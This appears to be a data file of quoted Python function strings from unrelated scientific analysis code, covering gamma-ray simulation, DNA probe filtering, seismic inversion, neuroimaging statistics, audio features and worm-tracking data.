"def RUN(numTrials, rateMap, numPhotons=48, angularSize=10.0, outputSize=300, mcList='MCOut.pickle',HESS=False, Sig = -1 ,numProcs = 10):\r\n print 'Beginning MC Series\\nProgress'\r\n \r\n import FermiPSF, ParseFermi\r\n mcOut = []\r\n map = pickle.load(open(rateMap, \"r\" )) # load rate-map\r\n PSFTableFront = FermiPSF.PSF_130(convType='front') # load PSF front converting\r\n PSFTableBack = FermiPSF.PSF_130(convType='back') # load PSF back converting\r\n\r\n start = time.time();\r\n \r\n ppa = outputSize/angularSize # pixel per degree\r\n\r\n # Import background template\r\n bgmap = 'BGRateMap.pickle'\r\n if (HESS == True):\r\n bgmap = 'BGRateMap_HESS_2_deg.pickle'\r\n \r\n bgTemplate = pickle.load(open(bgmap , \"r\" ))\r\n \r\n mcOut = np.zeros(numTrials)\r\n p = pool.Pool(numProcs)\r\n \r\n partial_MC_THREAD = partial( MC_THREAD, map = map,bgTemplate=bgTemplate,PSFTableFront=PSFTableFront, PSFTableBack=PSFTableBack, HESS=HESS, angularSize=angularSize, numPhotons=numPhotons, outputSize=outputSize,Sig = Sig)\r\n mcOut = p.map(partial_MC_THREAD, mcOut)\r\n \r\n# for i in range(numTrials): \r\n# # Build the background \r\n## background = Build_Background_Sideband(bgMean, lowSideband, highSideband, PSFTable)\r\n# background = Build_Background_Template(bg, bgTemplate, PSFTableFront, PSFTableBack,flatLevel = 0.0,HESS= HESS,angularSize = angularSize)\r\n# # Compute number of source photons\r\n# numMC = numPhotons - len(background[0])\r\n# # Run MC for source photons \r\n# data = MC(map,numMC,angularSize,outputSize,PSFTableFront, PSFTableBack,HESS=HESS)\r\n# # Append data\r\n# mcOut.append((data[0]+background[0], data[1]+background[1]))\r\n# \r\n# # Compute Speed Statistics\r\n# sys.stdout.write('\\r' + str(i+1)+'/'+str(numTrials)) \r\n# sys.stdout.flush()\r\n elapsed = time.time()-start;\r\n if (elapsed != 0.0):\r\n print '\\nSimulations Completed in', elapsed, 's', '(',numTrials/elapsed, ' sims per second)'\r\n \r\n outFile = open(mcList, \"wb\" )\r\n pickle.dump(mcOut, outFile)\r\n print 'Results saved to ', mcList\r\n return mcOut",
"def get_filtered_probes(seqdf, escores, models, mutate_cutoff, mutate_gap,\n egaps, thresholds, proteins, colors,\n generate_plots=False, spcomb=[(0, 0)], analysis_path=\"\",\n mode=\"custom\", predict_flanks=True, flank_len=0,\n key_colname=\"key\",\n show_model_flanks=False, get_complete_mutated=True,\n primer=\"\", max_mutate_count=2):\n filtered_probes = []\n # iterate through each site num and peak len combination\n for comb in spcomb:\n # get escore and model predictions for each protein\n es_preds = {}\n esplots = {}\n model_preds = {}\n model_plots = {}\n sitenum = comb[0]\n peaklen = comb[1]\n\n # get rows with the current sitenum and peaklen if specified\n if sitenum != 0 and peaklen != 0:\n df = seqdf.loc[(seqdf[\"sites_in_peak\"] == sitenum) & (seqdf[\"peaklen\"] == peaklen)]\n # otherwise use all rows\n else:\n df = seqdf\n # initialize escore and model objects for each protein\n for protein in proteins:\n protein_num = proteins.index(protein)\n es_preds[protein] = escores[protein].predict_sequences(df, key_colname=key_colname)\n esplots[protein] = escores[protein].make_plot_data(es_preds[protein], color=colors[protein_num][0])\n\n model_preds[protein] = models[protein].predict_sequences(df,\n key_colname=key_colname,\n predict_flanks=predict_flanks,\n flank_len=flank_len)\n model_plots[protein] = models[protein].make_plot_data(model_preds[protein],\n color=colors[protein_num][1],\n show_model_flanks=show_model_flanks)\n\n # Generate plots\n if generate_plots:\n sp = SitesPlotter()\n # if need to plot, uncomment this\n sp.plot_seq_combine([esplots, model_plots],\n filepath=\"%s/sitesplot_d%d_p%d.pdf\" %\n (analysis_path, sitenum, peaklen))\n\n # get filtered sequences\n filtered_seqs = {}\n flanks = {}\n print(\"Site filtering...\")\n print(\"Number of sites before mutating:\", len(es_preds[proteins[0]]))\n\n # get sequences with 2 significant binding sites\n sites_mutated = 0\n sites_removed = 0\n failed_mutations = 0\n for key in es_preds[proteins[0]]:\n curr_es_preds = {}\n curr_model_preds = {}\n for protein in proteins:\n curr_es_preds[protein] = es_preds[protein][key]\n curr_model_preds[protein] = model_preds[protein][key]\n #print(key,\"asd\",curr_model_preds[\"ets1\"])\n bs = Sequence(curr_es_preds, curr_model_preds, proteins=proteins,\n escore_cutoff=mutate_cutoff, escore_gap=mutate_gap,\n pbmescores=escores)\n ### print(key, bs.is_valid())\n if bs.is_valid():\n filtered_seqs[key] = bs\n # TODO: move all print statements to a log file\n # print(\"Number of sites mutated:\", sites_mutated)\n # print(\"Number of failed mutations:\", failed_mutations)\n # print(\"Number of sites removed:\", sites_removed)\n print(\"Number of sites after filtering:\", len(filtered_seqs))\n\n print(\"Creating m1,m2,m3 sequences...\")\n # for each of the filtered sequence, create m1,m2,m3 sequences\n seqdict = {}\n funcdict = {}\n for key in filtered_seqs:\n # Visualization part\n seqdict[\"%s-wt\" % key] = filtered_seqs[key].sequence\n # current binding site object\n bs = filtered_seqs[key]\n # get m1,m2,m3 for each wt\n for idx, mut in enumerate([[0], [1], [0, 1]]):\n # here we mutate on the first, second, and both sites\n # mut is the index of the site to abolish\n to_remove = bs.remove_pos(mut)\n mutseq = bs.abolish_sites(to_remove, mode=\"to_eliminate\",\n escore_threshold=mutate_cutoff)\n seqdict[\"%s-m%d\" % (key, idx + 1)] = mutseq.sequence\n funcdict[\"%s-m%d\" % (key, idx + 1)] = mutseq.plot_functions\n\n # get sequences that pass given escore gap and threshold combination\n for 
e in list(itertools.product(egaps, thresholds)):\n egapthres = e[0]\n ecutoff = e[1]\n\n # check that wt, m1, m2, m3 are valid\n if coopfilter.check_all_seqs(seqdict[\"%s-wt\" % key],\n seqdict[\"%s-m1\" % key],\n seqdict[\"%s-m2\" % key],\n seqdict[\"%s-m3\" % key],\n filtered_seqs[key].get_sites_dict(),\n escores,\n escore_cutoff=ecutoff,\n escore_gap=egapthres,\n get_complete_mutated=get_complete_mutated):\n bsites_dict = filtered_seqs[key].get_sites_dict()\n lst = [seqdict[\"%s-wt\" % key], seqdict[\"%s-m1\" % key], seqdict[\"%s-m2\" % key],\n seqdict[\"%s-m3\" % key]]\n lst, successful = clean_junctions(seqlst=lst,\n proteins=proteins,\n escores=escores,\n models=models,\n mutate_cutoff=mutate_cutoff,\n mutate_gap=mutate_gap,\n primer=\"GTCTTGATTCGCTTGACGCTGCTG\",\n max_mutate_count=max_mutate_count)\n if successful:\n # replace seqdict with the new sequences\n seqdict[\"%s-wt\" % key] = lst[0]\n seqdict[\"%s-m1\" % key] = lst[1]\n seqdict[\"%s-m2\" % key] = lst[2]\n seqdict[\"%s-m3\" % key] = lst[3]\n filtered_probes.append({\"key\": key,\n \"wt\": seqdict[\"%s-wt\" % key],\n \"m1\": seqdict[\"%s-m1\" % key],\n \"m2\": seqdict[\"%s-m2\" % key],\n \"m3\": seqdict[\"%s-m3\" % key],\n \"tf1\": bsites_dict[\"protein_1\"],\n \"tf2\": bsites_dict[\"protein_2\"],\n \"core1_start\": bsites_dict[\"core_start_1\"],\n \"core1_mid\": bsites_dict[\"core_mid_1\"],\n \"core1_end\": bsites_dict[\"core_end_1\"],\n \"core1_pref\": bsites_dict[\"score_1\"],\n \"core2_start\": bsites_dict[\"core_start_2\"],\n \"core2_mid\": bsites_dict[\"core_mid_2\"],\n \"core2_end\": bsites_dict[\"core_end_2\"],\n \"core2_pref\": bsites_dict[\"score_2\"],\n \"ecutoff\": ecutoff,\n \"egapthres\": egapthres,\n \"distance\": filtered_seqs[key].get_sites_dist(),\n \"sites_in_peak\": sitenum,\n \"peak_length\": peaklen\n })\n break # the sequence passes the filtering check, so stop\n\n # generate plots of wt, m1, m2, m3\n if generate_plots:\n filtered_es_preds = {}\n filtered_esplots = {}\n filtered_model_preds = {}\n filtered_model_plots = {}\n for protein in proteins:\n protein_num = proteins.index(protein)\n filtered_es_preds[protein] = escores[protein].predict_sequences(seqdict, key_colname=\"key\")\n filtered_esplots[protein] = escores[protein].make_plot_data(filtered_es_preds[protein], color=colors[protein_num][0])\n\n filtered_model_preds[protein] = models[protein].predict_sequences(seqdict,\n key_colname=\"key\",\n predict_flanks=predict_flanks)\n filtered_model_plots[protein] = models[protein].make_plot_data(filtered_model_preds[protein],\n color=colors[protein_num][1],\n show_model_flanks=show_model_flanks)\n sp.plot_seq_combine([filtered_esplots, filtered_model_plots],\n filepath=\"%splot_%s_d%d_p%d.pdf\" % (analysis_path, mode, sitenum, peaklen))\n\n return filtered_probes",
"def PARALLEL_worker_mc_inv(procnum, num_samples_per_processor, inversion_type, M_amplitude, green_func_array, real_data_array, comparison_metric, perform_normallised_waveform_inversion, compare_all_waveforms_simultaneously, return_dict_MTs, return_dict_similarity_values_all_samples, return_dict_shift_idxs, return_dict_MT_single_force_rel_amps, return_dict_medium_1_medium_2_rel_amp_ratios, invert_for_ratio_of_multiple_media_greens_func_switch, green_func_phase_labels, num_phase_types_for_media_ratios, invert_for_relative_magnitudes_switch=False, rel_exp_mag_range=[1.,1.], auto_shift_for_best_fit=True):\n print(\"Processing for process:\", procnum, \"for \", num_samples_per_processor, \"samples.\")\n \n # Define temp data stores for current process:\n tmp_MTs = np.zeros((len(green_func_array[0,:,0]), num_samples_per_processor), dtype=float)\n tmp_similarity_values_all_samples = np.zeros(num_samples_per_processor, dtype=float)\n tmp_shift_idxs_all_samples = []\n if inversion_type == \"DC_single_force_couple\" or inversion_type == \"DC_single_force_no_coupling\" or inversion_type == \"DC_crack_couple\" or inversion_type == \"single_force_crack_no_coupling\":\n tmp_MT_single_force_rel_amps = np.zeros(num_samples_per_processor, dtype=float)\n else:\n tmp_MT_single_force_rel_amps = []\n if invert_for_ratio_of_multiple_media_greens_func_switch:\n tmp_medium_1_medium_2_rel_amp_ratios = np.zeros(num_samples_per_processor, dtype=float)\n else:\n tmp_medium_1_medium_2_rel_amp_ratios = []\n if invert_for_ratio_of_multiple_media_greens_func_switch:\n if num_phase_types_for_media_ratios>0:\n tmp_frac_medium_2_diff_phases_dict = {} # Dictionary for temp storing of phase fractions of medium 1\n tmp_medium_1_medium_2_rel_amp_ratios_multi_phases = np.zeros((num_samples_per_processor, 3), dtype=float)\n else:\n tmp_medium_1_medium_2_rel_amp_ratios_multi_phases = []\n \n # Sort greens function storage if processing for multiple media:\n if invert_for_ratio_of_multiple_media_greens_func_switch:\n green_func_array_total_both_media = green_func_array.copy()\n \n # 3. Loop over samples, checking how well a given MT sample synthetic wavefrom from the forward model compares to the real data:\n for i in range(num_samples_per_processor):\n # Generate random medium amplitude ratio and associated greens functions (if required):\n if invert_for_ratio_of_multiple_media_greens_func_switch:\n # If want to invert for ratio of meduim 1 to medium 2 separately for different phases:\n if num_phase_types_for_media_ratios>0:\n # Generate different phase fractions:\n tmp_frac_medium_2_diff_phases_dict[\"P\"] = np.random.uniform(0.0, 1.0)\n tmp_frac_medium_2_diff_phases_dict[\"S\"] = np.random.uniform(0.0, 1.0)\n tmp_frac_medium_2_diff_phases_dict[\"surface\"] = np.random.uniform(0.0, 1.0)\n # Generate associated greens functions:\n green_func_array = np.zeros(np.shape(green_func_array_total_both_media[:,:,:,0]), dtype=float)\n # Loop over greens function for each station-phase:\n for j in range(len(green_func_phase_labels)):\n tmp_frac_medium_2 = tmp_frac_medium_2_diff_phases_dict[green_func_phase_labels[j]] # Get fraction for specific phase, for specific greens functions for specific station-phase\n green_func_array[j, :, :] = (1. - tmp_frac_medium_2)*green_func_array_total_both_media[j,:,:,0] + tmp_frac_medium_2*green_func_array_total_both_media[j,:,:,1] \n # Otherwise generate single fraction value and associated greens functions:\n else:\n frac_medium_2 = np.random.uniform(0.0, 1.0)\n green_func_array = (1. 
- frac_medium_2)*green_func_array[:,:,:,0] + frac_medium_2*green_func_array[:,:,:,1]\n \n # 4. Generate synthetic waveform for current sample:\n # Vary moment amplitude randomly if specified:\n if invert_for_relative_magnitudes_switch:\n M_amplitude_exp_factor = np.random.uniform(low=rel_exp_mag_range[0], high=rel_exp_mag_range[1])\n M_amplitude = 10.**M_amplitude_exp_factor\n # And generate waveform from source mechanism tensor:\n if inversion_type==\"full_mt\":\n MT_curr_sample = generate_random_MT()*M_amplitude # Generate a random MT sample\n elif inversion_type==\"full_mt_Lune_samp\":\n MT_curr_sample = generate_random_MT_Lune_samp()*M_amplitude # Generate a random MT sample, sampled uniformly in Lune space\n elif inversion_type==\"DC\":\n MT_curr_sample = generate_random_DC_MT()*M_amplitude # Generate a random DC sample\n elif inversion_type==\"single_force\":\n MT_curr_sample = generate_random_single_force_vector()*M_amplitude # Generate a random single force sample\n elif inversion_type == \"DC_single_force_couple\":\n MT_curr_sample, random_DC_to_single_force_amp_frac = generate_random_DC_single_force_coupled_tensor() # Generate a random DC-single-force coupled sample, with associated relative amplitude of DC to single force\n MT_curr_sample = MT_curr_sample*M_amplitude\n elif inversion_type == \"DC_single_force_no_coupling\":\n MT_curr_sample, random_DC_to_single_force_amp_frac = generate_random_DC_single_force_uncoupled_tensor()\n MT_curr_sample = MT_curr_sample*M_amplitude\n elif inversion_type == \"DC_crack_couple\":\n MT_curr_sample, random_DC_to_single_force_amp_frac = generate_random_DC_crack_coupled_tensor()\n MT_curr_sample = MT_curr_sample*M_amplitude\n elif inversion_type == \"single_force_crack_no_coupling\":\n MT_curr_sample, random_DC_to_single_force_amp_frac = generate_random_single_force_crack_uncoupled_tensor()\n MT_curr_sample = MT_curr_sample*M_amplitude\n synth_waveform_curr_sample = forward_model(green_func_array, MT_curr_sample) # Note: Greens functions must be of similar amplitude units going into here...\n \n # 5. Compare real data to synthetic waveform (using variance reduction or other comparison metric), to assign probability that data matches current model:\n similarity_curr_sample, shift_idxs = compare_synth_to_real_waveforms(real_data_array, synth_waveform_curr_sample, comparison_metric, perform_normallised_waveform_inversion, compare_all_waveforms_simultaneously, auto_shift_for_best_fit) \n \n # 6. 
Append results to data store:\n tmp_MTs[:,i] = MT_curr_sample[:,0]\n tmp_similarity_values_all_samples[i] = similarity_curr_sample\n tmp_shift_idxs_all_samples.append(list(shift_idxs))\n if inversion_type == \"DC_single_force_couple\" or inversion_type == \"DC_single_force_no_coupling\" or inversion_type == \"DC_crack_couple\" or inversion_type == \"single_force_crack_no_coupling\":\n tmp_MT_single_force_rel_amps[i] = random_DC_to_single_force_amp_frac\n if invert_for_ratio_of_multiple_media_greens_func_switch:\n if num_phase_types_for_media_ratios>0:\n tmp_medium_1_medium_2_rel_amp_ratios_multi_phases[i,0] = tmp_frac_medium_2_diff_phases_dict[\"P\"]\n tmp_medium_1_medium_2_rel_amp_ratios_multi_phases[i,1] = tmp_frac_medium_2_diff_phases_dict[\"S\"]\n tmp_medium_1_medium_2_rel_amp_ratios_multi_phases[i,2] = tmp_frac_medium_2_diff_phases_dict[\"surface\"]\n else:\n tmp_medium_1_medium_2_rel_amp_ratios[i] = frac_medium_2\n \n if i % 10000 == 0:\n print(\"Processor number:\", procnum, \"- Processed for\",i,\"samples out of\",num_samples_per_processor,\"samples\")\n \n # 7. And convert misfit measure to likelihood function probability:\n tmp_similarity_values_all_samples = np.exp(-(1.-tmp_similarity_values_all_samples)/2.)\n \n # And return values back to script:\n return_dict_MTs[procnum] = tmp_MTs\n return_dict_similarity_values_all_samples[procnum] = tmp_similarity_values_all_samples\n return_dict_shift_idxs[procnum] = tmp_shift_idxs_all_samples\n return_dict_MT_single_force_rel_amps[procnum] = tmp_MT_single_force_rel_amps\n if num_phase_types_for_media_ratios>0:\n return_dict_medium_1_medium_2_rel_amp_ratios[procnum] = tmp_medium_1_medium_2_rel_amp_ratios_multi_phases\n else:\n return_dict_medium_1_medium_2_rel_amp_ratios[procnum] = tmp_medium_1_medium_2_rel_amp_ratios\n print(\"Finished processing process:\", procnum, \"for \", num_samples_per_processor, \"samples.\")",
"def computeSoftwareStatsModels(df,data_label,roi_cols,covar_cols,outcome_col,signific_col,stat_model,mc_correction):\n software_list = df[data_label].unique()\n print('Running {} mass-univariate {} statsmodels on {} {}'.format(len(roi_cols), stat_model, len(software_list),data_label))\n \n # index results on ROI names\n scores_concat_df = pd.DataFrame()\n for pipe in software_list:\n sm_df = df[df[data_label]==pipe]\n print('{} {}'.format(data_label, pipe))\n scores_df = getStatModelPerf2(sm_df,roi_cols,covar_cols,outcome_col,signific_col,stat_model,mc_correction)\n scores_df[data_label] = np.tile(pipe,len(scores_df))\n scores_concat_df = scores_concat_df.append(scores_df)\n print('Top 10 significant regions:\\n {}'.format(scores_df.sort_values(by=['p_val']).head(10)))\n\n return scores_concat_df",
"def runAllGLMS(self):\n\t\tfor condition in ['WMM']:\n\t\t\tfor run in self.conditionDict[condition]:\n\t\t\t\t\n\t\t\t\t# remove previous feat directories\n\t\t\t\ttry:\n\t\t\t\t\tself.logger.debug('rm -rf ' + self.runFile(stage = 'processed/mri', run = self.runList[run], postFix = ['mcf', 'sgtf'], extension = '.feat'))\n\t\t\t\t\tos.system('rm -rf ' + self.runFile(stage = 'processed/mri', run = self.runList[run], postFix = ['mcf', 'sgtf'], extension = '.feat'))\n\t\t\t\t\tos.system('rm -rf ' + self.runFile(stage = 'processed/mri', run = self.runList[run], postFix = ['mcf', 'sgtf'], extension = '.fsf'))\n\t\t\t\texcept OSError:\n\t\t\t\t\tpass\n\t\t\t\t\n\t\t\t\t# this is where we start up fsl feat analysis after creating the feat .fsf file and the like\n\t\t\t\tthisFeatFile = '/home/moorselaar/WMM_PRF/analysis/analysis.fsf'\n\t\t\t\tREDict = {\n\t\t\t\t#'---OUTPUT_DIR---':self.runFile(stage = 'processed/mri', run = r, postFix = ['mcf', 'sgtf']),\n\t\t\t\t'---NR_TRS---':str(NiftiImage(self.runFile(stage = 'processed/mri', run = self.runList[run], postFix = ['mcf', 'sgtf'])).timepoints),\n\t\t\t\t'---FUNC_FILE---':self.runFile(stage = 'processed/mri', run = self.runList[run], postFix = ['mcf', 'sgtf']), \n\t\t\t\t'---CONFOUND_EV---':self.runFile(stage = 'processed/mri', run = self.runList[run], postFix = ['mcf'], extension='.par'), \n\t\t\t\t# '---ANAT_FILE---':os.path.join(os.environ['SUBJECTS_DIR'], self.subject.standardFSID, 'mri', 'bet', 'T1_bet' ), \n\t\t\t\t'---STIM_FILE---':self.runFile(stage = 'processed/behavior', run = self.runList[run], postFix = ['stim_all'], extension='.txt'),\n\t\t\t\t'---RESPONSE_FILE---':self.runFile(stage = 'processed/behavior', run = self.runList[run], postFix = ['resp_all'], extension='.txt'),\n\t\t\t\t'---PPU_FILE---':self.runFile(stage = 'processed/hr', run = self.runList[run], postFix = ['ppu'], extension='.txt'),\n\t\t\t\t'---PPU_R_FILE---':self.runFile(stage = 'processed/hr', run = self.runList[run], postFix = ['ppu','raw'], extension='.txt'),\n\t\t\t\t'---RESP_FILE---':self.runFile(stage = 'processed/hr', run = self.runList[run], postFix = ['resp'], extension='.txt'),\n\t\t\t\t'---RESP_R_FILE---':self.runFile(stage = 'processed/hr', run = self.runList[run], postFix = ['resp','raw'], extension='.txt')\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\tfeatFileName = self.runFile(stage = 'processed/mri', run = self.runList[run], extension = '.fsf')\n\t\t\t\tfeatOp = FEATOperator(inputObject = thisFeatFile)\n\t\t\t\t# no need to wait for execute because we're running the mappers after this sequence - need (more than) 8 processors for this, though.\n\t\t\t\tif self.runList[run] == [self.runList[i] for i in self.conditionDict['WMM']][-1]:\n\t\t\t\t\tfeatOp.configure( REDict = REDict, featFileName = featFileName, waitForExecute = True )\n\t\t\t\telse:\n\t\t\t\t\tfeatOp.configure( REDict = REDict, featFileName = featFileName, waitForExecute = False )\n\t\t\t\tself.logger.debug('Running feat from ' + thisFeatFile + ' as ' + featFileName)\n\t\t\t\t# run feat\n\t\t\t\tfeatOp.execute()",
"def worker(selection_idx, results_table):\n randgen = np.random.RandomState()\n \n # Data-specific positive set partition (the real-world dataset consists of multiple motif classes, always exactly 3 instances of each class stored consequently).\n # The partition assures that the training and test sets do not share instances of the same motif class\n positive_n_train = round(0.8 * len(positive_set_) / 3) * 3\n block_start_idx = randgen.randint(positive_n_train / 3 + 1) * 3 \n block_end_idx = block_start_idx + len(positive_set_) - positive_n_train\n positive_set_part_train, positive_set_part_test = (np.concatenate((positive_set_[: block_start_idx], positive_set_[block_end_idx: ])), positive_set_[block_start_idx: block_end_idx])\n \n # Negative set partition with random selection of elements to match the size of the positive set\n negative_set = negative_set_[randgen.choice(len(negative_set_), size = positive_set_.shape[0], replace = False)]\n negative_n = len(negative_set)\n negative_n_train = round(negative_n * 0.8)\n negative_set_part_train, negative_set_part_test = (negative_set[: negative_n_train], negative_set[negative_n_train: ])\n \n data_part_train = np.float64(np.concatenate((positive_set_part_train, negative_set_part_train)))\n labels_part_train = np.concatenate((np.ones(len(positive_set_part_train), dtype = 'i1'), np.zeros(len(negative_set_part_train), dtype = 'i1')))\n data_part_test = np.float64(np.concatenate((positive_set_part_test, negative_set_part_test)))\n labels_part_test = np.concatenate((np.ones(len(positive_set_part_test), dtype = 'i1'), np.zeros(len(negative_set_part_test), dtype = 'i1')))\n \n # Specifying the pipeline and the CV structure\n pruner = feature_selection.VarianceThreshold()\n scaler = preprocessing.StandardScaler()\n feature_selector = feature_selection.SelectKBest(feature_selection.f_classif)\n classifier = svm.SVC(kernel = 'rbf', gamma = 0.01, class_weight = 'balanced')\n pipeline0 = pipeline.Pipeline([\n ('pruning', pruner),\n ('scaling', scaler),\n ('selection', feature_selector),\n ('classification', classifier)\n ])\n cv_structure = model_selection.StratifiedShuffleSplit(n_splits = 10, test_size = 0.2)\n scoring = 'recall_macro' #same as balanced accuracy\n grid = model_selection.GridSearchCV(pipeline0, scoring = scoring, param_grid = param_grid, cv = cv_structure, n_jobs = 1)\n \n # Training the pipeline, saving the data\n grid.fit(data_part_train, labels_part_train)\n results_table[selection_idx][0] = np.log10(grid.best_params_['classification__C'])\n results_table[selection_idx][1] = grid.best_params_['selection__k']\n results_table[selection_idx][2] = grid.best_score_\n \n # Testing the pipeline, saving the data\n results_table[selection_idx][3] = grid.score(data_part_test, labels_part_test)",
"def computeSoftwareMLModels(df,data_label,roi_cols,covar_continuous_cols,covar_cat_cols,outcome_col,group_col,model_type,ml_model,rank_features=False,compute_null=False,n_splits=10,n_repeats=10,n_jobs=1):\n software_list = df[data_label].unique()\n print('Running ML classifer on {} {}'.format(len(software_list),data_label))\n scores_concat_df = pd.DataFrame()\n feature_rank_concat_df = pd.DataFrame()\n external_scores_concat_df = pd.DataFrame()\n\n perf_pval_dict = {}\n for pipe in software_list:\n ml_df = df[df[data_label]==pipe]\n print('{} {}'.format(data_label, pipe))\n\n #cross_val_score\n scores_df, null_df, pvalue, feature_rank_df = getMLModelPerf(ml_df,roi_cols,covar_continuous_cols,covar_cat_cols,outcome_col,model_type,ml_model,rank_features,compute_null,n_splits,n_repeats,n_jobs) \n scores_df[data_label] = np.tile(pipe,len(scores_df))\n scores_concat_df = scores_concat_df.append(scores_df)\n \n if compute_null:\n null_df[data_label] = np.tile('null',len(null_df))\n scores_concat_df = scores_concat_df.append(null_df)\n perf_pval_dict[pipe] = pvalue\n\n # RFECV\n if rank_features:\n feature_rank_df[data_label] = np.tile(pipe,len(feature_rank_df))\n feature_rank_concat_df = feature_rank_concat_df.append(feature_rank_df)\n\n # explicit CV for internal vs external perfomance\n if group_col:\n external_scores_df = getIndependentTestSetPerf(ml_df,roi_cols,covar_continuous_cols,covar_cat_cols,outcome_col,group_col,model_type,ml_model)\n external_scores_df[data_label] = np.tile(pipe,len(external_scores_df))\n external_scores_concat_df = external_scores_concat_df.append(external_scores_df) \n\n return scores_concat_df, perf_pval_dict, feature_rank_concat_df, external_scores_concat_df",
"def run_pipeline(directory):\n\n # io = IO(path)\n # df = io.load_cleaned_file(download_always=False)\n # df = add_choke_events(df)\n\n # Add calls to features.Xxx here\n\n #directory = main_directory\n site=os.listdir(directory)\n site_dicom={}\n site_dicom_sub={}\n site_sub_files={}\n i,k,j=0,0,0\n for filename in site:\n site_dicom[i]=directory+'/'+filename+'/DICOM-raw'\n temporary_path=os.listdir(site_dicom[i])\n\n for another_file in temporary_path:\n site_dicom_sub[j]=site_dicom[i]+'/'+another_file+'/scans'\n temporary_path_1 = os.listdir(site_dicom_sub[j])\n for another_file_1 in temporary_path_1:\n site_sub_files[k]=site_dicom_sub[j]+'/'+another_file_1+'/'\n k=k+1\n j = j + 1\n i=i+1\n splitted={}\n output_mif={}\n for i in range (len(site_sub_files)):\n splitted[i]=site_sub_files[i].split('/')\n output_mif[i]=directory+'/'+splitted[i][5]+'/MIF-raw/'+splitted[i][5]+'_'+splitted[i][7]+'_'+splitted[i][9]+'.mif'\n\n\n # save (or return) dataframe here?\n return site_sub_files,output_mif",
"def extract_features(audio_filename, args):\n #print(\"Extract_features\")\n spec_type = args['spec_type']\n\n if spec_type == 'cqt':\n bin_multiple = args['bin_multiple']\n max_midi = args['max_midi']\n min_midi = args['min_midi']\n note_range = max_midi - min_midi + 1\n sr = args['sr']\n hop_length = args['hop_length']\n window_size = args['window_size']\n\n bins_per_octave = 12 * bin_multiple # should be a multiple of 12\n n_bins = note_range * bin_multiple\n\n # down-sample,mono-channel\n y, _ = librosa.load(audio_filename, sr)\n # y: an np.ndarray[ shape=(n,) ] giving the audio time series. librosa.load automatically downsamples to the\n # required sample rate sr\n # doku on librosa.cqt:\n # https://librosa.github.io/librosa/generated/librosa.core.cqt.html?highlight=cqt#librosa.core.cqts\n S = librosa.cqt(y, fmin=librosa.midi_to_hz(min_midi), sr=sr, hop_length=hop_length,\n bins_per_octave=bins_per_octave, n_bins=n_bins)\n S = S.T\n S = np.abs(S)\n min_db = np.min(S)\n print(np.min(S), np.max(S), np.mean(S))\n S = np.pad(S, ((window_size // 2, window_size // 2), (0, 0)), 'constant', constant_values=min_db)\n\n windows = []\n\n # IMPORTANT NOTE:\n # Since we pad the the spectrogram frame,\n # the onset frames are actually `offset` frames.\n # To obtain a window of the center frame at each true index, we take a slice from i to i+window_size\n # starting at frame 0 of the padded spectrogram\n for i in range(S.shape[0] - window_size + 1):\n w = S[i:i + window_size, :]\n windows.append(w)\n\n # print inputs\n x = np.array(windows)\n return x\n\n else:\n print(\"WARNING: feature type \" + spec_type + \" not implemented.\")\n return 0",
"def main():\n parser = argparse.ArgumentParser(description=\"Process the results of an experiment.\")\n parser.add_argument(\"experiment\")\n arguments = parser.parse_args()\n path = f\"experiments/{arguments.experiment}\"\n if not os.path.exists(path):\n raise SystemExit(f\"Path {path} does not exists.\")\n\n # For efficiency, one should generate the results from the parts without merging them.\n files = [file for file in os.listdir(path) if os.path.isfile(os.path.join(path, file))]\n frames = []\n for file in files:\n device, experiment, _ = file.split(\".\")\n frame = pandas.read_csv(\n os.path.join(path, file),\n index_col=\"variable\",\n usecols=[\"variable\", \"group_index\", \"value_i\"], dtype={\"value_i\": \"Int64\"}\n )\n frame[\"board\"] = device\n frame[\"experiment\"] = experiment\n frames.append(frame)\n dataframe = pandas.concat(frames)\n frames = None\n\n current_grouping = dataframe.groupby([\"group_index\", \"variable\"])\n \n data = current_grouping.agg([\n numpy.median,\n _percentile_factory(95),\n numpy.mean,\n numpy.std,\n \"count\"\n ])\n\n print(data)\n \n data = data.droplevel([0], axis=1)\n data = data.unstack()\n data.columns = data.columns.map('_'.join)\n data.to_csv(f\"{arguments.experiment}.csv\")",
"def featMatGenerator(dirName, trajfile, trajFilter):\n \n #load the data and extract feature vectors for each trajectory and plate summary for each chunk\n featMatTraj = {}\n featMatPlate = pd.DataFrame()\n try:\n if len(trajfile.split('_'))<10:\n fshort = '_'.join(trajfile.split('_')[0:-2:6])\n else:\n fshort = '_'.join(trajfile.split('_')[0:-1:7])\n featMatPlate = pd.DataFrame()\n with pd.HDFStore(os.path.join(dirName, trajfile), 'r') as fid:\n nChunks = list(fid.keys())\n for chunk in nChunks:\n chunkno = [int(s) for s in chunk.split('_') if s.isdigit()]\n chunkno = chunkno[0]\n\n featMatTraj[chunkno] = pd.DataFrame()\n nWorms = np.unique(fid[chunk]['worm_index'])\n for w in nWorms:\n if fid[chunk][fid[chunk]['worm_index']==w].shape[0]>=trajFilter:\n featMatTraj[chunkno] = featMatTraj[chunkno].append(\\\n fid[chunk][fid[chunk]['worm_index']==w].mean(),ignore_index=True)\n \n featMatTraj[chunkno].reset_index(drop=True)\n \n temp = featMatTraj[chunkno].median()\n temp = temp.drop(['worm_index', 'timestamp']).rename(lambda x: x +'_med').to_frame().transpose()\n \n temp2 = featMatTraj[chunkno].quantile(0.75) - featMatTraj[chunkno].quantile(0.25)\n temp2 = temp2.drop(['worm_index', 'timestamp']).rename(lambda x: x + '_iqr').to_frame().transpose()\n \n tempfinal = pd.concat([temp, temp2], axis = 1)\n tempfinal ['exp'] = fshort\n tempfinal['Chunk'] = chunk\n tempfinal ['drug'] = fshort.split('_')[0]\n \n featMatPlate = featMatPlate.append(tempfinal, ignore_index=True)\n del temp, temp2, tempfinal\n del nWorms\n del nChunks\n \n featMatPlate.reset_index(drop=True) \n featMatPlate.drop(featMatPlate.columns[np.sum(featMatPlate.isna()>featMatPlate.shape[0]/2)], \\\n axis=1, inplace = True)\n except OSError:\n print (trajfile + 'is invalid file format') \n\n #write the featMatPlate to a .csv file\n featMatPlate.to_csv(os.path.join(os.path.dirname(dirName), fshort + '_FeatMatPlate.csv'))\n\n #save the featMatTraj to an excel file\n writer = pd.ExcelWriter(os.path.join(os.path.dirname(dirName), fshort + '_FatMatTraj.xlsx'))\n for chunk in featMatTraj.keys():\n featMatTraj[chunk].to_excel(writer, sheet_name = str(chunk))\n writer.save()\n \n return featMatTraj, featMatPlate",
